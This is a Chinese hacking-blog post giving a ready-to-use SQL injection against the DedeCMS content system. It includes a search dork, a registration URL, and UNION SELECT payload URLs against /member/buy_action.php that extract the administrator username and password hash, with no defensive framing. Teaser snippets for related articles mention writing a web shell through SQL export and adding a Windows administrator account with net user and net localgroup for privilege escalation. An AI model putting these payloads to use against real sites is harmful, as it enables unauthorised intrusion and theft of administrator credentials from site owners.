dedecms注入爆管理员用户密码 ***

hacker4年前 (2020-05-31)黑客文章934

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

写本篇文章的目的在于揭露一种黑客作弊的手段，也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。前几日，我的客户电话说自己的百度排名没有了，查询下竟然...

首先用暴路径漏洞找到绝对路径，然后替换下面的路径随便选个数据库，然后执行以下的sql（利用sql命令导出一个shell） Create TABLE a (cmd text NOT N...

什么叫SAINT？ SAINT是一种付钱商品，能够将安全内容自动化技术协议书（SCAP）标准做为历经身份认证的系统漏洞，没经身份认证的漏洞检测程序流程和补丁下载扫描仪程序流程出示适用。SAINT扫...

360功能多，现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹，提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xx...

第一节、黑客的种类和行为以我的理解，“黑客”大体上应该分为“正”、“邪”两类，正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善，而邪派黑客则是通过各种黑客技能对系统进行攻击、入...

与好友在网络上相互传输资料时，有时先要知道对方计算机的IP地址，才能与对方建立信息传输通道。那么对方的IP地址该如何搜查得到呢？这样的问题你也许会嗤之以鼻，的确，查询对方计算机的IP地址，实在简单...

找黑客平台